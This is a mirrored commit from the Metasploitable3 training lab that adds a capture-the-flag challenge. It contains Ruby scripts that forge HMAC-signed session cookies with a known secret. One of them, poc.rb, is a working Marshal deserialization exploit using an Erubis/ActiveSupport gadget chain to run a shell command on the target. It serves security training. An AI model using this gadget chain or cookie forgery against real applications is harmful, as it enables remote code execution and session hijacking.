mirror of
https://github.com/rapid7/metasploitable3.git
synced 2024-09-21 00:01:14 +02:00
Add 6 of Clubs
This commit is contained in:
parent
129119ac97
commit
5ba1a36fd3
1
resources/flags/linux_flags/6_of_clubs/base64_string.txt
Normal file
1
resources/flags/linux_flags/6_of_clubs/base64_string.txt
Normal file
File diff suppressed because one or more lines are too long
29
resources/flags/linux_flags/6_of_clubs/check_sinatra_vuln.rb
Normal file
29
resources/flags/linux_flags/6_of_clubs/check_sinatra_vuln.rb
Normal file
|
@ -0,0 +1,29 @@
|
||||||
|
# -*- coding: binary -*-
|
||||||
|
|
||||||
|
#
|
||||||
|
# This will check our vulnerable app to see if it's vulnerable or not.
|
||||||
|
# It does so by predicting the hash in the cookie.
|
||||||
|
#
|
||||||
|
|
||||||
|
require 'openssl'
|
||||||
|
require 'cgi'
|
||||||
|
require 'net/http'
|
||||||
|
require 'base64'
|
||||||
|
|
||||||
|
SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
|
||||||
|
|
||||||
|
cli = Net::HTTP.new('172.28.128.3', 8181)
|
||||||
|
req = Net::HTTP::Get.new('/')
|
||||||
|
res = cli.request(req)
|
||||||
|
cookie = res['Set-Cookie'].scan(/_metasploitable=(.+); path/).flatten.first || ''
|
||||||
|
data, hash = cookie.split('--')
|
||||||
|
obj = Marshal.load(Base64.decode64(CGI.unescape(data)))
|
||||||
|
puts "[*] Found data: #{obj}"
|
||||||
|
puts "[*] Found hash: #{hash}"
|
||||||
|
puts "[*] Attempting to recreate the same hash with secret: #{SECRET}"
|
||||||
|
expected_hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, CGI.unescape(data))
|
||||||
|
puts "[*] Predicted hash: #{expected_hash}"
|
||||||
|
|
||||||
|
if expected_hash == hash
|
||||||
|
puts "[*] Yay! we can predict the hash. The server is vulnerable."
|
||||||
|
end
|
48
resources/flags/linux_flags/6_of_clubs/get_flag.rb
Normal file
48
resources/flags/linux_flags/6_of_clubs/get_flag.rb
Normal file
|
@ -0,0 +1,48 @@
|
||||||
|
#!/usr/bin/env ruby
|
||||||
|
|
||||||
|
#
|
||||||
|
# This PoC will inject Ruby code in our vulnerable app.
|
||||||
|
# It will run the system command "id", and save the output in /tmp/your_id.txt
|
||||||
|
#
|
||||||
|
|
||||||
|
require 'openssl'
|
||||||
|
require 'cgi'
|
||||||
|
require 'net/http'
|
||||||
|
require 'base64'
|
||||||
|
require 'digest'
|
||||||
|
|
||||||
|
SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
|
||||||
|
|
||||||
|
http = Net::HTTP.new('172.28.128.3', 8181)
|
||||||
|
req = Net::HTTP::Get.new('/')
|
||||||
|
res = http.request(req)
|
||||||
|
cookie = res['Set-Cookie'].scan(/_metasploitable=(.+); path/).flatten.first || ''
|
||||||
|
data, hash = cookie.split('--')
|
||||||
|
obj = Marshal.load(Base64.decode64(CGI.unescape(data)))
|
||||||
|
sid = obj['session_id']
|
||||||
|
puts "[*] Obtained session ID: #{sid}"
|
||||||
|
|
||||||
|
puts "[*] Using stolen SECRET: #{SECRET}"
|
||||||
|
puts "[*] Modifying _metasploitable cookie to 'six of clubs'"
|
||||||
|
data = { 'session_id' => sid, '_metasploitable' => "six of clubs" }
|
||||||
|
dump = [ Marshal.dump(data) ].pack('m')
|
||||||
|
hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump)
|
||||||
|
cookie = "_metasploitable=#{CGI.escape("#{dump}--#{hmac}")}"
|
||||||
|
|
||||||
|
req = Net::HTTP::Get.new('/flag')
|
||||||
|
req['Cookie'] = cookie
|
||||||
|
res = http.request(req)
|
||||||
|
|
||||||
|
File.open('6_of_clubs.png', 'wb') { |f| f.write(res.body) }
|
||||||
|
md5 = Digest::MD5.hexdigest(res.body)
|
||||||
|
puts "[*] 6_of_clubs.png downloaded."
|
||||||
|
puts "[*] 6 of Clubs MD5: #{md5}"
|
||||||
|
|
||||||
|
=begin
|
||||||
|
$ ruby get_flag.rb
|
||||||
|
[*] Obtained session ID: e3d1958384f27cc5f16424f060c480ff28048ebd4bff3f338d00f045ff308752
|
||||||
|
[*] Using stolen SECRET: a7aebc287bba0ee4e64f947415a94e5f
|
||||||
|
[*] Modifying _metasploitable cookie to 'six of clubs'
|
||||||
|
[*] 6_of_clubs.png downloaded.
|
||||||
|
[*] 6 of Clubs MD5: d9247a49d132a4f92dcc813f63eb1c8b
|
||||||
|
=end
|
34
resources/flags/linux_flags/6_of_clubs/poc.rb
Normal file
34
resources/flags/linux_flags/6_of_clubs/poc.rb
Normal file
|
@ -0,0 +1,34 @@
|
||||||
|
#!/usr/bin/env ruby
|
||||||
|
|
||||||
|
#
|
||||||
|
# This PoC will inject Ruby code in our vulnerable app.
|
||||||
|
# It will run the system command "id", and save the output in /tmp/your_id.txt
|
||||||
|
#
|
||||||
|
|
||||||
|
require 'openssl'
|
||||||
|
require 'cgi'
|
||||||
|
require 'net/http'
|
||||||
|
|
||||||
|
SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
|
||||||
|
|
||||||
|
module Erubis;class Eruby;end;end
|
||||||
|
module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
|
||||||
|
|
||||||
|
erubis = Erubis::Eruby.allocate
|
||||||
|
erubis.instance_variable_set :@src, "%x(id > /tmp/your_id.txt); 1"
|
||||||
|
proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
|
||||||
|
proxy.instance_variable_set :@instance, erubis
|
||||||
|
proxy.instance_variable_set :@method, :result
|
||||||
|
proxy.instance_variable_set :@var, "@result"
|
||||||
|
|
||||||
|
session = { 'session_id' => '', 'exploit' => proxy }
|
||||||
|
|
||||||
|
dump = [ Marshal.dump(session) ].pack('m')
|
||||||
|
hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump)
|
||||||
|
cookie = "_metasploitable=#{CGI.escape("#{dump}--#{hmac}")}"
|
||||||
|
|
||||||
|
http = Net::HTTP.new('127.0.0.1', 8181)
|
||||||
|
req = Net::HTTP::Get.new('/')
|
||||||
|
req['Cookie'] = cookie
|
||||||
|
res = http.request(req)
|
||||||
|
puts "Done"
|
BIN
resources/flags/linux_flags/6_of_clubs/source.png
Normal file
BIN
resources/flags/linux_flags/6_of_clubs/source.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 419 KiB |
Loading…
Reference in New Issue
Block a user